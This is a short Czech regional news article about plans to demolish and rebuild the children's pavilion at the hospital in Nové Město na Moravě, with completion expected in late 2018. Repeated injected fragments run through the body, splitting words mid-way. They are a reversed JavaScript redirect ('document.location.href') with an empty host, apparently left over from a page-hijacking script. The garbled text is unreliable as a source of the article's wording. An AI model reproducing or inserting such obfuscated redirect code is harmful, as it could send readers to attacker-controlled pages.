Rainbow page separator

Dětské oddělení v nemocnici příští rok zbourají a postaví nové

Středa, 9. března 2016

Nemocnice Nové Město na Moravě - dětské oddělení

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nový dětský pavilon vznikne v novoměstské nemocnici. Původně se počítalo, že stávající budova dětského oddělení z 50. let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí bude zrekonstruována a doplněna přístavbou, krajští radní ale rozhodli o zbourání starého objektu a výstavbě nového. „Od rekonstrukce stávajícího pavilonu s přístavbou lůžkové části jsme po vyhodnocení nákladů na předpokládané práce upustili. Objevily se problémy se statikou, upozorněni jsme byli na vady příček, poškození konstrukcí, nevyhovující hydroizolaci i nutnost vyztužit svislou i základovou konstrukci. Při porovnání nákladů na rekonstrukci a na výstavbu nové budovy jsme došli k rozhodnutí strhnout stávající objekt a na jeho místě postavit nový,“ uvedl náměstek hejtmana Kraje Vysočina pro oblast financí Vladimír Novotný.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos plánuje vedení kraje připravit veškerou dokumentaci, v roce 2017 se bude bourat a pak stavět. Malí pacienti budou po dobu výstavby přemístěni do náhradních pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů.
Dokončení nového pavilonu je předpokládáno koncem roku 2018. První nadzemní podlaží bude sloužit dětským ambulancím včetně neurologické, ORL, vejdou se tam čekárny i zázemí pro lékaře a personál. Ve druhém podlaží najde mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dětské lůžkové oddělení s více než třemi desítkami míst, počítáno je i s lůžky pro doprovod dětí. Všechny pokoje budou mít vlastní sociální zařízení.